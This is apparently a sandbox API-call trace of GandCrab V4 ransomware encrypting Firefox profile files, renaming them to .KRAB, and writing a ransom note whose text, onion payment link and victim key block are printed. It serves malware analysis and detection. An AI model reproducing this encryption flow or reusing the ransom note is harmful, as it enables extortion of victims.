lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="extensions.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json" [0080.536] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.536] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json.KRAB") returned 100 [0080.536] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json") returned 95 [0080.536] lstrlenW (lpString=".json") returned 5 [0080.536] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.536] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".json ") returned 6 [0080.537] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.537] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json") returned 95 [0080.537] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json") returned 95 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="desktop.ini") returned 1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="autorun.inf") returned 1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="ntuser.dat") returned -1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="iconcache.db") returned -1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="bootsect.bak") returned 1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="boot.ini") returned 1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="ntuser.dat.log") returned -1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="thumbs.db") returned -1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="KRAB-DECRYPT.html") returned -1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="ntldr") returned -1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="NTDETECT.COM") returned -1 [0080.537] lstrcmpiW (lpString1="extensions.json", lpString2="Bootfont.bin") returned 1 [0080.537] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.538] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011700) returned 1 [0080.539] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.540] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.540] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.540] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0080.540] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0080.540] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.541] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010d70) returned 1 [0080.542] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.542] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.543] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.543] CryptGenRandom (in: hProv=0x1010d70, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0080.543] CryptReleaseContext (hProv=0x1010d70, dwFlags=0x0) returned 1 [0080.543] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.543] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010930) returned 1 [0080.544] CryptImportKey (in: hProv=0x1010930, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023cb8) returned 1 [0080.545] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0080.545] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0080.545] GetLastError () returned 0x0 [0080.545] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.545] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0080.545] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011678) returned 1 [0080.546] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023cb8) returned 1 [0080.547] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0080.547] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0080.547] GetLastError () returned 0x0 [0080.547] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.547] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0080.547] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0080.549] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0080.550] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0080.550] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x172b, lpOverlapped=0x0) returned 1 [0080.597] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffffe8d5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.597] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x172b, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x172b, lpOverlapped=0x0) returned 1 [0080.598] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0080.598] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.602] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.603] CloseHandle (hObject=0x7ec) returned 1 [0080.604] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.604] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.json.krab")) returned 1 [0080.605] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.605] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0080.605] lstrcmpW (lpString1="formhistory.sqlite", lpString2=".") returned 1 [0080.605] lstrcmpW (lpString1="formhistory.sqlite", lpString2="..") returned 1 [0080.605] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="formhistory.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite" [0080.605] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.605] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite.KRAB") returned 103 [0080.605] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite") returned 98 [0080.605] lstrlenW (lpString=".sqlite") returned 7 [0080.605] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.606] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0080.606] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.606] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite") returned 98 [0080.606] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite") returned 98 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="desktop.ini") returned 1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="autorun.inf") returned 1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="ntuser.dat") returned -1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="iconcache.db") returned -1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="bootsect.bak") returned 1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="boot.ini") returned 1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="ntuser.dat.log") returned -1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="thumbs.db") returned -1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="ntldr") returned -1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="NTDETECT.COM") returned -1 [0080.606] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="Bootfont.bin") returned 1 [0080.606] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.607] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010df8) returned 1 [0080.608] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.609] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.609] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.609] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0080.609] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0080.609] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.609] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011810) returned 1 [0080.611] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.611] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.612] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.612] CryptGenRandom (in: hProv=0x1011810, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0080.612] CryptReleaseContext (hProv=0x1011810, dwFlags=0x0) returned 1 [0080.612] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.612] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10115f0) returned 1 [0080.613] CryptImportKey (in: hProv=0x10115f0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023cb8) returned 1 [0080.614] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0080.614] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0080.614] GetLastError () returned 0x0 [0080.614] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.614] CryptReleaseContext (hProv=0x10115f0, dwFlags=0x0) returned 1 [0080.614] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011018) returned 1 [0080.616] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023cb8) returned 1 [0080.616] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0080.616] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0080.616] GetLastError () returned 0x0 [0080.616] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.616] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0080.616] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\formhistory.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0080.617] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0080.617] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0080.618] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x30000, lpOverlapped=0x0) returned 1 [0080.658] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffd0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.658] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x30000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x30000, lpOverlapped=0x0) returned 1 [0080.659] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0080.659] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.663] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.664] CloseHandle (hObject=0x7ec) returned 1 [0080.673] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.673] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\formhistory.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\formhistory.sqlite.krab")) returned 1 [0080.674] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.675] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0080.675] lstrcmpW (lpString1="gmp", lpString2=".") returned 1 [0080.675] lstrcmpW (lpString1="gmp", lpString2="..") returned 1 [0080.675] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="gmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp" [0080.675] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\" [0080.675] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0080.675] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.675] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.675] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.675] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.675] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.676] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.676] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\\\KRAB-DECRYPT.txt") returned 101 [0080.676] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0080.677] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 